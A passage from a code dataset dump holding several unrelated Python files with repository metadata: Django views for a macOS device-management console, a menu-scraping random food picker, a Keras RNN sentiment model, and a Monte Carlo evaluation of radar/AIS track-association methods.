extra_dock=extra_dock, extra_firewall=extra_firewall,\n edit_mode=False)\n context['form'] = form\n\n # Ensure the automatic profile removal options are hidden if not being utilized\n context['custom_script'] = \"$(document).ready(function (){$('#id_auto_remove').change(function (){\" \\\n \"if (this.value == 'default') {$('#div_id_removal_date').hide();\" \\\n \"$('#div_id_removal_period').hide();}else{$('#div_id_removal_date').show();\" \\\n \"$('#div_id_removal_period').show();}});$('#id_auto_remove').change();});\"\n context['msg'] = \"Manage Configuration Profile\"\n return render(request, 'form_crispy.html', context)\n\n\n@require_GET\ndef mobile_config(request, profile_id, action='Install'):\n \"\"\"\n Endpoint for generating and downloading a macOS configuration profile. The request must include the MDM Client\n token for authentication purposes.\n\n If `action` is set to `Uninstall`, the resulting file will cause existing copies of the profile to be removed from\n the device.\n\n :param profile_id: Primary key of configuration profile\n :param action: Either 'Install' or 'Uninstall'\n \"\"\"\n config = get_object_or_404(ConfigurationProfile, pk=profile_id)\n if not request.GET or 'token' not in request.GET:\n raise PermissionDenied\n token = request.GET['token']\n if token != settings.MDM_TOKEN:\n raise PermissionDenied\n with open(config.profile) as profile:\n context = json.load(profile)\n context['UUID'] = \"%s-%s\" % (settings.MDM_UUID, context['identifiers']['info'])\n context['identifiers'] = load_ids(context['identifiers'])\n context['password'] = settings.MDM_PASS\n if action == 'Uninstall':\n context['data']['auto_remove'] = 'expire'\n context['data']['removal_date'] = None\n context['data']['removal_period'] = 15\n temp = loader.get_template('mdm/laptop_settings.xml')\n response = FileResponse(temp.render(context), content_type='application/force-download')\n response['Content-Disposition'] = 'attachment; filename=\"profile.mobileconfig\"'\n return response\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef remove_device(request, pk):\n \"\"\"\n Removes a device from the MDM. Presents warnings and instructions for how to complete the operation correctly.\n\n :param pk: Primary key of device\n \"\"\"\n device = get_object_or_404(Laptop, pk=pk)\n context = {}\n if request.method == 'POST':\n form = RemovalForm(request.POST)\n if form.is_valid():\n device.mdm_enrolled = False\n device.serial = None\n device.asset_tag = None\n device.last_ip = None\n device.last_checkin = None\n device.save()\n template = loader.get_template('default.html')\n return HttpResponse(template.render({'title': 'Device Removed',\n 'message': 'This device is no longer associated with the MDM.',\n 'EXIT_BTN': True, 'EXIT_URL': reverse(\"mdm:list\"), 'NO_FOOT': True},\n request))\n else:\n context['form'] = RemovalForm(request.POST)\n else:\n if device.serial == 'DISCONNECTED':\n context['form'] = RemovalForm(uninstalled=True)\n else:\n context['form'] = RemovalForm()\n return render(request, 'form_crispy.html', context)\n\n\ndef handle_expired_profiles():\n \"\"\"Checks for expired profiles and updates listings accordingly\"\"\"\n expired_profiles = InstallationRecord.objects.filter(expires__lte=timezone.now(), active=True)\n for record in expired_profiles:\n device = record.device\n profile = record.profile\n device.installed.remove(profile)\n record.active = False\n record.save()\n\n\n@login_required\n@permission_required('devices.view_removal_password', raise_exception=True)\ndef removal_password(request):\n \"\"\"Displays the password that can be used to manually remove configuration profiles from managed devices\"\"\"\n context = {'title': 'Profile Removal Password', 'password': settings.MDM_PASS, 'now': timezone.now()}\n return render(request, 'laptops/password.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef remove_profile(request, profile, device=0):\n \"\"\"\n If a primary key value is supplied for both the `device` and `profile`, the user will be able to remove the\n assignment between the profile and that particular device. If only the `profile` is provided, all device assignments\n for the profile will be removed and the profile data will be deleted. In both cases, two options will be presented\n to the user:\n\n 1.) Mark the profile as removed (if the profile had already been removed manually)\n\n 2.) Instruct the MDM to remove the profile automatically at the next checkin\n\n :param profile: Primary key of configuration profile\n :param device: Primary key of device (Optional)\n \"\"\"\n context = {}\n config = get_object_or_404(ConfigurationProfile, pk=profile)\n if device == 0:\n # Completely remove Configuration Profile from MDM\n mode = 'delete'\n if config.installed.all().count() == 0:\n config.delete()\n messages.success(request, \"Profile was successfully deleted\", extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:list\"))\n else:\n context['form'] = ProfileRemovalForm(mode=mode)\n else:\n # Unlink profile from device\n laptop = get_object_or_404(Laptop, pk=device)\n if config in laptop.pending.all():\n laptop.pending.remove(config)\n record = InstallationRecord.objects.filter(profile=config, device=laptop, active=True, version=\"RM\").first()\n # If record exists (profile is already installed) reset to installed status\n if record is not None:\n laptop.installed.add(config)\n with open(config.profile) as profile:\n context = json.load(profile)\n record.version = str(context['data']['version'])\n record.save()\n messages.success(request, \"Removal request cancelled\", extra_tags='success')\n else:\n messages.success(request, \"Profile is no longer assigned to {}\".format(laptop.name),\n extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:list\"))\n elif config in laptop.installed.all():\n mode = 'disassociate'\n context['form'] = ProfileRemovalForm(mode=mode)\n else:\n raise Http404\n\n # If auto-removal option presented, handle form data\n if request.method == 'POST':\n form = ProfileRemovalForm(request.POST, mode=mode)\n if form.is_valid():\n selected = form.cleaned_data['options']\n if selected == 'auto':\n if mode == 'disassociate':\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.version = \"RM\"\n record.save()\n laptop.installed.remove(config)\n laptop.pending.add(config)\n else:\n # Cancel all pending assignments first\n for laptop in config.pending_install.all():\n config.pending_install.remove(laptop)\n\n # Prepare MDM to remove profile from device\n for laptop in config.installed.all():\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.version = \"RM\"\n record.save()\n laptop.installed.remove(config)\n laptop.pending.add(config)\n messages.success(request, \"Profiles will be removed automatically at next checkin\",\n extra_tags='success')\n else:\n if mode == 'disassociate':\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.expires = timezone.now()\n record.active = False\n record.save()\n laptop.installed.remove(config)\n messages.success(request, \"Profile successfully removed from {}\".format(laptop.name),\n extra_tags='success')\n else:\n for laptop in config.installed.all():\n record = get_object_or_404(InstallationRecord, profile=config, device=laptop, active=True)\n record.expires = timezone.now()\n record.active = False\n record.save()\n config.delete()\n messages.success(request, \"Configuration profile deleted successfully\")\n return HttpResponseRedirect(reverse(\"mdm:list\"))\n else:\n context['form'] = form\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.add_apps', raise_exception=True)\ndef add_app(request):\n \"\"\"\n Administrators can use this page to add new managed applications. Non-admin users will have the option\n to request new software. Requests from non-admins will trigger a notification for the Webmaster.\n \"\"\"\n context = {}\n title = \"New Application\"\n if not request.user.has_perm('devices.manage_apps'):\n title = \"Request Application\"\n\n if request.method == 'POST':\n form = NewAppForm(data=request.POST, title=title, request_user=request.user)\n if form.is_valid():\n form.save()\n if title == \"Request Application\":\n message = request.user.name + \" has requested that you add \" + request.POST['name'] + \\\n \" to the list of available applications in the MDM Managed Software Library.

\" \\\n \"Log into the MDM Console to \" \\\n \"view or deny the request.\"\n email = GenericEmailGenerator(subject=\"New MacBook Software Request\", to_emails=settings.EMAIL_TARGET_W,\n body=message)\n email.send()\n messages.success(request, \"Your request has been submitted. The Webmaster will review it shortly.\")\n return HttpResponseRedirect(reverse(\"home\"))\n messages.success(request, \"Application added successfully!\")\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n form = NewAppForm(title=title, request_user=request.user)\n context['form'] = form\n context['msg'] = title\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.view_apps', raise_exception=True)\ndef view_app(request, pk):\n \"\"\"\n Details page for a specific managed application\n\n :param pk: Primary key of managed application\n \"\"\"\n\n app = get_object_or_404(MacOSApp, pk=pk)\n\n context = {'app': app}\n return render(request, 'mdm/app_detail.html', context)\n\n\n@login_required\n@permission_required('devices.view_apps', raise_exception=True)\ndef app_list(request):\n \"\"\"Lists all the applications available through Homebrew\"\"\"\n return render(request, 'mdm/app_list.html', {})\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef update_app_info(request, pk):\n \"\"\"\n Update the metadata for a managed application.\n\n :param pk: Primary key of managed application\n \"\"\"\n context = {}\n\n app = get_object_or_404(MacOSApp, pk=pk)\n\n if request.method == 'POST':\n form = UpdateAppForm(request.POST, instance=app)\n if form.is_valid():\n if request.POST['save'] == \"Save Changes\":\n form.save()\n messages.success(request, \"Application info updated successfully\")\n elif request.POST['save'] == \"Merge\":\n form.save()\n return HttpResponseRedirect(reverse(\"mdm:merge-app\", args=[app.pk]))\n else:\n app = form.instance\n return HttpResponseRedirect(reverse(\"mdm:remove-app\", args=[app.pk]))\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n form = UpdateAppForm(instance=app)\n context['form'] = form\n context['msg'] = \"Application Info\"\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef merge_app(request, pk):\n \"\"\"\n Page for merging two app records together. This is helpful when we want to hide duplicates.\n\n :param pk: Primary key of the managed application to be merged\n \"\"\"\n\n context = {}\n\n app = get_object_or_404(MacOSApp, pk=pk)\n\n if request.method == 'POST':\n form = AppMergeForm(request.POST, pk=pk)\n if form.is_valid():\n selected = form.cleaned_data.get('options')\n parent = MacOSApp.objects.get(pk=selected)\n app.merged_into = parent\n app.save()\n if parent.description in [None, ''] and app.description not in [None, '']:\n parent.description = app.description\n if parent.version in [None, ''] and app.version not in [None, '']:\n parent.version = app.version\n if parent.developer in [None, ''] and app.developer not in [None, '']:\n parent.developer = app.developer\n if parent.developer_website in [None, ''] and app.developer_website not in [None, '']:\n parent.developer_website = app.developer_website\n parent.save()\n messages.success(request, 'Applications merged successfully')\n return HttpResponseRedirect(reverse('mdm:apps'))\n else:\n form = AppMergeForm(pk=pk)\n context['form'] = form\n app_name = MacOSApp.objects.get(pk=pk).name\n context['msg'] = 'Merge ' + app_name + ' into...'\n return render(request, 'form_crispy.html', context)\n\n\ndef refresh_managed_software_status():\n \"\"\" Checks the Munki catalogs to retrieve the latest managed software lists \"\"\"\n\n try:\n with open(settings.MEDIA_ROOT + '/software/catalogs/default', 'rb') as catalog:\n data = plistlib.load(catalog)\n\n apps = []\n\n # Grab app data from plist\n for app_data in data:\n app_name = app_data.get('display_name', None)\n app_description = app_data.get('description', None)\n app_version = app_data.get('version', None)\n app_developer = app_data.get('developer', None)\n apps.append({\"name\": app_name, \"description\": app_description.strip(), \"version\": app_version,\n \"developer\": app_developer})\n\n # Update database\n managed_apps = []\n for app in apps:\n obj = MacOSApp.objects.filter(name__iexact=app['name']).first()\n if obj:\n if obj.merged_into is not None:\n obj = obj.merged_into\n obj.managed = True\n managed_apps.append(obj)\n if app['description'] and not obj.description:\n obj.description = app['description']\n if app['developer'] and not obj.developer:\n obj.developer = app['developer']\n if app['version'] and not obj.version:\n obj.version = app['version']\n obj.save()\n else:\n obj = MacOSApp.objects.create(name=app['name'], description=app['description'],\n version=app['version'], developer=app['developer'], managed=True)\n managed_apps.append(obj)\n\n # Check for old managed apps that are no longer in the catalog\n for app in MacOSApp.objects.filter(managed=True).all():\n if app not in managed_apps:\n app.managed = False\n app.save()\n except FileNotFoundError:\n pass\n\n\n@login_required\n@permission_required(\"devices.manage_apps\", raise_exception=True)\ndef reload_from_munki(request, pk):\n \"\"\"\n Refresh an application's record with data from the Munki catalog\n\n :param pk: The primary key of the application to refresh data for\n \"\"\"\n\n app = get_object_or_404(MacOSApp, pk=pk)\n description = app.description\n version = app.version\n app.description = None\n app.version = None\n app.save()\n\n refresh_managed_software_status()\n\n app.refresh_from_db()\n\n if app.description in [None, '']:\n app.description = description\n if app.version in [None, '']:\n app.version = version\n app.save()\n\n return HttpResponseRedirect(reverse(\"mdm:app-detail\", args=[pk]))\n\n\n@login_required\n@permission_required('devices.view_apps', raise_exception=True)\ndef list_apps(request, pk=0):\n \"\"\"\n If a value is provided for `pk`, this will list all the managed applications assigned to the respective device.\n Otherwise this will list all the managed apps under the MDM.\n\n :param pk: Primary key of device (Optional)\n \"\"\"\n context = {'items': [], 'resource_type': 'App'}\n\n if pk == 0:\n context['h2'] = \"Managed Applications\"\n context['header_1'] = \"Developer\"\n context['header_2'] = \"Version\"\n refresh_managed_software_status()\n apps = MacOSApp.objects.filter(merged_into__isnull=True).reverse()\n if not request.user.has_perm('devices.manage_apps'):\n apps = apps.filter(managed=True).exclude(installed__isnull=True, pending_install__isnull=True)\n for app in apps:\n assignment_count = app.pending_install.count()\n installed_on = app.installed.all()\n data = {'meta': app, 'assignment_count': assignment_count, 'installed': installed_on}\n context['items'].append(data)\n else:\n if not request.user.has_perm('devices.manage_apps'):\n raise PermissionDenied\n\n device = get_object_or_404(Laptop, pk=pk)\n context['h2'] = \"Applications on {}\".format(device.name)\n context['header_1'] = \"Developer\"\n context['header_2'] = \"Version\"\n context['device_view'] = True\n context['device_id'] = pk\n apps = MacOSApp.objects.filter(pending_install__in=[device])\n apps |= MacOSApp.objects.filter(installed__in=[device])\n for app in apps:\n status = 'Not assigned'\n for entry in app.installed.all():\n if entry == device:\n status = 'Installed'\n for entry in app.pending_install.all():\n if entry == device:\n status = 'Assigned'\n data = {'meta': app, 'status': status}\n context['items'].append(data)\n\n return render(request, 'mdm/resource_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef list_app_devices(request, pk):\n \"\"\"\n List all devices linked to a specific app\n\n :param pk: Primary key of managed application\n \"\"\"\n context = {}\n app = get_object_or_404(MacOSApp, pk=pk)\n pending = Laptop.objects.filter(apps_pending__in=[app])\n installed = InstallationRecord.objects.filter(app=app, device__apps_installed__in=[app], active=True)\n context['resource'] = app\n context['resource_type'] = 'App'\n context['pending'] = pending\n context['installed'] = installed\n return render(request, 'mdm/device_list.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef link_apps(request, device=None, app=None):\n \"\"\"\n Assign managed apps to a device. If a primary key value for `device` is supplied, a list of managed applications\n will be displayed. The user can then select which applications to assign to the respective device. The opposite is\n true when a primary key value is supplied for `app`.\n\n :param device: Primary key of device (Optional)\n :param app: Primary key of managed application (Optional)\n \"\"\"\n context = {}\n\n if device is not None:\n resource_type = \"apps\"\n rel = get_object_or_404(Laptop, pk=device)\n options = MacOSApp.objects.exclude(Q(pending_install__in=[rel]) | Q(installed__in=[rel]))\\\n .filter(merged_into__isnull=True)\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more applications to assign to this device.\"\n else:\n resource_type = \"devices\"\n rel = get_object_or_404(MacOSApp, pk=app)\n options = Laptop.objects.filter(mdm_enrolled=True, retired=False) \\\n .exclude(Q(apps_pending__in=[rel]) | Q(apps_installed__in=[rel]))\n # The following message will be displayed if there are no options (doesn't render in the form view)\n context['message'] = \"It seems like there are no more eligible devices to assign this app to.\"\n if request.method == 'POST':\n form = AssignmentForm(request.POST, type=resource_type, options=options)\n if form.is_valid():\n selected = form.cleaned_data.get('options')\n context['NO_FOOT'] = True\n if isinstance(rel, Laptop):\n for option in selected:\n app = MacOSApp.objects.get(pk=option)\n rel.apps_pending.add(app)\n if len(selected) == 1:\n context['message'] = \"1 app was assigned to %s\" % rel.name\n else:\n context['message'] = \"%s apps were assigned to %s\" % (len(selected), rel.name)\n elif isinstance(rel, MacOSApp):\n for option in selected:\n device = Laptop.objects.get(name=option)\n rel.pending_install.add(device)\n context['message'] = \"This application has been assigned to %s new device(s)\" % (len(selected))\n context['title'] = \"Success!\"\n context['EXIT_BTN'] = True\n context['EXIT_URL'] = reverse(\"mdm:list\")\n return render(request, 'default.html', context)\n else:\n if options.count() == 0:\n context['title'] = \"Hmm...\"\n context['NO_FOOT'] = True\n return render(request, 'default.html', context)\n form = AssignmentForm(type=resource_type, options=options)\n context['form'] = form\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_apps', raise_exception=True)\ndef remove_app(request, app, device=0):\n \"\"\"\n If a primary key value is supplied for both the `device` and `app`, the user will be able to remove the\n assignment between the managed application and that particular device. If only the `app` is provided, all device\n assignments for the application will be removed and the app will no longer be available to devices under the MDM.\n\n :param app: Primary key of managed application\n :param device: Primary key of device (Optional)\n \"\"\"\n context = {}\n app = get_object_or_404(MacOSApp, pk=app)\n if device == 0:\n # Completely remove Application from MDM\n mode = 'delete'\n if app.installed.all().count() == 0:\n app.delete()\n messages.success(request, \"Application was successfully deleted\", extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n context['form'] = UninstallAppForm(mode=mode)\n else:\n # Unlink app from device\n laptop = get_object_or_404(Laptop, pk=device)\n if app in laptop.apps_pending.all():\n laptop.apps_pending.remove(app)\n messages.success(request, \"Application is no longer assigned to {}\".format(laptop.name),\n extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n\n # If pending removal reset to installed status\n if app in laptop.apps_remove.all():\n laptop.apps_installed.add(app)\n laptop.apps_remove.remove(app)\n messages.success(request, \"Removal request cancelled\", extra_tags='success')\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n\n if app in laptop.apps_installed.all():\n mode = 'disassociate'\n context['form'] = UninstallAppForm(mode=mode)\n else:\n raise Http404\n\n # Handle form data\n if request.method == 'POST':\n form = UninstallAppForm(request.POST, mode=mode)\n if form.is_valid():\n if mode == 'disassociate':\n record = get_object_or_404(InstallationRecord, app=app, device=laptop, active=True)\n record.active = False\n record.expires = timezone.now()\n record.save()\n laptop.apps_installed.remove(app)\n messages.success(request, \"Application successfully removed from {}\".format(laptop.name),\n extra_tags='success')\n else:\n app.delete()\n messages.success(request, \"Application deleted successfully\")\n return HttpResponseRedirect(reverse(\"mdm:apps\"))\n else:\n context['form'] = form\n return render(request, 'form_crispy.html', context)\n\n\n@login_required\n@permission_required('devices.manage_mdm', raise_exception=True)\ndef logs(request):\n \"\"\"Displays logs detailing what was installed on what devices and when\"\"\"\n def get_timestamp(data):\n return data.get('timestamp')\n\n events = []\n for record in InstallationRecord.objects.all():\n if record.profile:\n resource = record.profile\n resource_type = \"(Configuration Profile) \"\n else:\n resource = record.app\n if record.version:\n resource_type = \"(\" + record.version + \") \"\n else:\n resource_type = \"\"\n if record.active:\n obj = {'timestamp': record.installed_on,\n 'details': resource.name + \" \" + resource_type + \"was installed on \" + record.device.name}\n events.append(obj)\n else:\n obj = {'timestamp': record.expires,\n 'details': resource.name + \" \" + resource_type + \"was removed from \" + record.device.name}\n events.append(obj)\n obj = {'timestamp': record.installed_on,\n 'details': resource.name + \" \" + resource_type + \"was installed on \" + record.device.name}\n events.append(obj)\n events.sort(key=get_timestamp, reverse=True)\n\n paginator = Paginator(events, 50)\n page_number = request.GET.get('page', 1)\n current_page = paginator.get_page(page_number)\n context = {'headers': ['Timestamp', 'Event'], 'title': 'Install Log', 'events': current_page}\n return render(request, 'access_log.html', context)\n","repo_name":"WPI-LNL/lnldb","sub_path":"devices/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":57405,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"24741234051","text":"from bs4 import BeautifulSoup\nimport requests\nfrom tkinter import * \nimport random\n\nurl = \"https://www.pizzeriamilan.nu/\"\npage = requests.get(url)\n\n # Creating the soup\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n # Initializing the list\nh2_list = []\n\n # Getting all the h2 tags\nh2_tags = soup.find_all(\"div\", {\"class\": \"text-wrap\"})\n\n # Appending h2 text to the list\nfor h2 in h2_tags:\n h2_list.append(h2.find(\"h2\").text)\n\n # Manipulating the list\nh2_list = [item.replace(\"\\n\", \"\").replace(\"\\r\", \"\") for item in h2_list]\n\n # Printing the list\nprint(h2_list)\n\n\n# Function to randomly select an item. \ndef random_item(): \n\t# Select an item randomly. \n\tx = random.choice(h2_list) \n\t# Set the label to display the item. \n\tlabel.config(text = x) \n\n# Create a window. \nroot = Tk() \n\n# Set the title of the window. \nroot.title(\"Random Food picker at Pizzeria Milan\") \n\n# Create a label to display the randomly \n# selected item. \nlabel = Label(root, font = ('Helvetica', 20)) \nlabel.pack() \n\n# Create a button to generate a random item. \nbutton = Button(root, text = \"Get food item\", \n\t\t\t\tcommand = random_item, \n\t\t\t\tbg = \"white\", fg = \"black\") \nbutton.pack(fill = X) \n\nroot.geometry(\"400x100\")\n# Run the main loop. \nroot.mainloop()","repo_name":"mhmdalkhyyt/milan_food_picker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11546918728","text":"# -*- coding: UTF-8 -*-\n__author__ = 'zy'\n__time__ = '2019/12/12 16:43'\nfrom keras.layers import LSTM,Embedding,SimpleRNN,Dense\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nimport keras.models\nfrom keras.datasets import imdb\n\nmax_features=10000\nmaxlen=500\nbatch_size=32\n\n(input_train,y_train),(input_test,y_test)=imdb.load_data(num_words=max_features)\ninput_train=sequence.pad_sequences(input_train,maxlen=maxlen)\ninput_test=sequence.pad_sequences(input_test,maxlen=maxlen)\n\nmodel=Sequential()\nmodel.add(Embedding(10000,32))\nmodel.add(SimpleRNN(32))\nmodel.add(Dense(1,activation='sigmoid'))\n\nmodel.compile(optimizer='rmsprop',loss='binary_crossentropy',metrics=['acc'])\n\nhistory=model.fit(input_train,y_train,\n epochs=10,\n batch_size=128,\n validation_split=0.2)\n\nmodel.summary()\n\nimport matplotlib.pyplot as plt\n\nacc=history.history['acc']\nval_acc=history.history['val_acc']\nloss=history.history['loss']\nval_loss=history.history['val_loss']\n\nepochs=range(1,len(acc)+1)\n\nplt.plot(epochs,acc,'bo',label='Training acc')\nplt.plot(epochs,val_acc,'b',label='Validation acc')\n\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\nplt.plot(epochs,loss,'bo',label='Training loss')\nplt.plot(epochs,val_loss,'b',label='Validation loss')\nplt.title('Training and Validation loss')\n\nplt.legend()\n\nplt.show()\nfrom keras.models import load_model\n# 保存模型 from keras.models import load_model\nmodel.save('model_simpleRnn.h5') # HDF5文件,pip install h5py","repo_name":"yemanzhongting/notebook","sub_path":"1212rnn/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30482721716","text":"\"\"\"MC_COUNTING_TECHNIQUE\n\nScript to\n\n\"\"\"\n\n# seeds\nimport numpy as np\nfrom stonesoup.types.state import GaussianState\n\nfrom data_association.CountingAssociator import CountingAssociator\nfrom data_association.bar_shalom_hypothesis_associators import HypothesisTestIndependenceAssociator, \\\n HypothesisTestDependenceAssociator\nfrom trackers.kf_dependent_fusion_async_sensors import KalmanFilterDependentFusionAsyncSensors\nfrom utils import open_object\nfrom utils.scenario_generator import generate_scenario_3\n\nstart_seed = 0\nend_seed = 5 # normally 500\nnum_mc_iterations = end_seed - start_seed\n\n# params\nsave_fig = False\n\n# scenario parameters\nsigma_process_list = [0.3] # [0.05, 0.05, 0.05, 0.5, 0.5, 0.5, 3, 3, 3]\nsigma_meas_radar_list = [50] # [5, 30, 200, 5, 30, 200, 5, 30, 200]\nsigma_meas_ais_list = [10] # [10] * 9\nradar_meas_rate = 1 # relevant radar meas rates: 1\nais_meas_rate_list = [6] # relevant AIS meas rates: 2 - 12\ntimesteps = 200\n\n# associator params\nassociation_distance_threshold = 20\nconsecutive_hits_confirm_association = 3\nconsecutive_misses_end_association = 2\nalpha = 0.02\n\n# dicts to store final results for printing in a latex friendly way\nPc_overall = {} # Pc is the percentage of correctly associating tracks that originate from the same target\nsomething_else_overall = {}\nstats = []\n\nfor sigma_process, sigma_meas_radar, sigma_meas_ais, ais_meas_rate in zip(sigma_process_list, sigma_meas_radar_list,\n sigma_meas_ais_list, ais_meas_rate_list):\n for seed in range(start_seed, end_seed):\n # generate scenario\n generate_scenario_3(seed=seed, permanent_save=False, radar_meas_rate=radar_meas_rate,\n ais_meas_rate=ais_meas_rate, sigma_process=sigma_process,\n sigma_meas_radar=sigma_meas_radar, sigma_meas_ais=sigma_meas_ais,\n timesteps=timesteps)\n\n folder = \"temp\" # temp instead of seed, as it is not a permanent save\n\n # load ground truth and the measurements\n data_folder = \"../scenarios/scenario3/\" + folder + \"/\"\n ground_truth = open_object.open_object(data_folder + \"ground_truth.pk1\")\n measurements_radar = open_object.open_object(data_folder + \"measurements_radar.pk1\")\n measurements_ais = open_object.open_object(data_folder + \"measurements_ais.pk1\")\n\n # load start_time\n start_time = open_object.open_object(data_folder + \"start_time.pk1\")\n\n # prior\n initial_covar = np.diag([sigma_meas_radar * sigma_meas_ais, sigma_meas_radar * sigma_process,\n sigma_meas_radar * sigma_meas_ais, sigma_meas_radar * sigma_process]) ** 2\n prior = GaussianState([1, 1.1, -1, 0.9], initial_covar, timestamp=start_time)\n\n kf_dependent_fusion = KalmanFilterDependentFusionAsyncSensors(start_time, prior,\n sigma_process_radar=sigma_process,\n sigma_process_ais=sigma_process,\n sigma_meas_radar=sigma_meas_radar,\n sigma_meas_ais=sigma_meas_ais)\n\n tracks_fused_dependent, tracks_radar, tracks_ais = kf_dependent_fusion.track_async(\n start_time, measurements_radar, measurements_ais, fusion_rate=1)\n\n # use the CountingAssociator to evaluate whether the tracks are associated\n associator = CountingAssociator(association_distance_threshold, consecutive_hits_confirm_association,\n consecutive_misses_end_association)\n independence_test_associator = HypothesisTestIndependenceAssociator(alpha=alpha)\n dependence_test_associator = HypothesisTestDependenceAssociator(alpha=alpha)\n\n num_correct_associations_counting = 0\n num_false_mis_associations_counting = 0\n num_correct_associations_independent_hypothesis = 0\n num_false_mis_associations_independent_hypothesis = 0\n num_correct_associations_dependent_hypothesis = 0\n num_false_mis_associations_dependent_hypothesis = 0\n for i in range(1, len(tracks_radar)):\n # use the associators to check for association\n associated_counting = associator.associate_tracks(tracks_radar[:i], tracks_ais[:i])\n associated_independence_test = independence_test_associator.associate_tracks(tracks_radar[:i + 1],\n tracks_ais[:i + 1])\n cross_cov_list = kf_dependent_fusion.cross_cov_list\n cross_cov_dict = {'cross_cov_ij': cross_cov_list,\n 'cross_cov_ji': [cross_cov.transpose() for cross_cov in cross_cov_list]}\n associated_dependence_test = dependence_test_associator.associate_tracks(tracks_radar[:i + 1],\n tracks_ais[:i + 1],\n cross_cov_ij=cross_cov_list[\n :i + 1],\n cross_cov_ji=[cross_cov.transpose()\n for cross_cov\n in cross_cov_list[\n :i + 1]]\n )\n # save the associations in dicts\n num_correct_associations_counting += associated_counting\n num_false_mis_associations_counting += not associated_counting\n num_correct_associations_independent_hypothesis += associated_independence_test\n num_false_mis_associations_independent_hypothesis += not associated_independence_test\n num_correct_associations_dependent_hypothesis += associated_dependence_test\n num_false_mis_associations_dependent_hypothesis += not associated_dependence_test\n\n # save the number of correct associations and false mis associations in a dict\n stats_individual = {'seed': seed, 'num_correct_associations': num_correct_associations_counting,\n 'num_false_mis_associations': num_false_mis_associations_counting,\n 'type': \"counting\"}\n stats.append(stats_individual)\n stats_individual = {'seed': seed, 'num_correct_associations': num_correct_associations_independent_hypothesis,\n 'num_false_mis_associations': num_false_mis_associations_independent_hypothesis,\n 'type': \"independent\"}\n stats.append(stats_individual)\n stats_individual = {'seed': seed, 'num_correct_associations': num_correct_associations_dependent_hypothesis,\n 'num_false_mis_associations': num_false_mis_associations_dependent_hypothesis,\n 'type': \"dependent\"}\n stats.append(stats_individual)\n\n # print the percentage correct associations for each technique\n percentage_correct_counting = num_correct_associations_counting/(\n num_correct_associations_counting + num_false_mis_associations_counting\n )\n percentage_correct_independent_hypothesis = num_correct_associations_independent_hypothesis / (\n num_correct_associations_independent_hypothesis + num_false_mis_associations_independent_hypothesis\n )\n percentage_correct_dependent_hypothesis = num_correct_associations_dependent_hypothesis/(\n num_correct_associations_dependent_hypothesis + num_false_mis_associations_dependent_hypothesis\n )\n text = \"counting: \" + str(percentage_correct_counting) +\\\n \", independent: \" + str(percentage_correct_independent_hypothesis) + \\\n \", dependent: \" + str(percentage_correct_dependent_hypothesis)\n print(text)\n\n# calc the #correct_associations and #false_mis_associations for each associating technique\ntot_num_correct_associations_counting = sum(\n [stat['num_correct_associations'] for stat in stats if stat['type'] == \"counting\"]\n)\ntot_num_false_mis_associations_counting = sum(\n [stat['num_false_mis_associations'] for stat in stats if stat['type'] == \"counting\"]\n)\ntot_num_correct_associations_independent_hypothesis = sum(\n [stat['num_correct_associations'] for stat in stats if stat['type'] == \"independent\"]\n)\ntot_num_false_mis_associations_independent_hypothesis = sum(\n [stat['num_false_mis_associations'] for stat in stats if stat['type'] == \"independent\"]\n)\ntot_num_correct_associations_dependent_hypothesis = sum(\n [stat['num_correct_associations'] for stat in stats if stat['type'] == \"dependent\"]\n)\ntot_num_false_mis_associations_dependent_hypothesis = sum(\n [stat['num_false_mis_associations'] for stat in stats if stat['type'] == \"dependent\"]\n)\n\n# todo: print the total percentage correct associations\ntot_percentage_correct_counting = tot_num_correct_associations_counting / (\n tot_num_correct_associations_counting + tot_num_false_mis_associations_counting\n)\ntot_percentage_correct_independent_hypothesis = tot_num_correct_associations_independent_hypothesis / (\n tot_num_correct_associations_independent_hypothesis + tot_num_false_mis_associations_independent_hypothesis\n)\ntot_percentage_correct_dependent_hypothesis = tot_num_correct_associations_dependent_hypothesis / (\n tot_num_correct_associations_dependent_hypothesis + tot_num_false_mis_associations_dependent_hypothesis\n)\ntext = \"Total: \\ncounting: \" + str(tot_percentage_correct_counting) + \\\n \", independent: \" + str(tot_percentage_correct_independent_hypothesis) + \\\n \", dependent: \" + 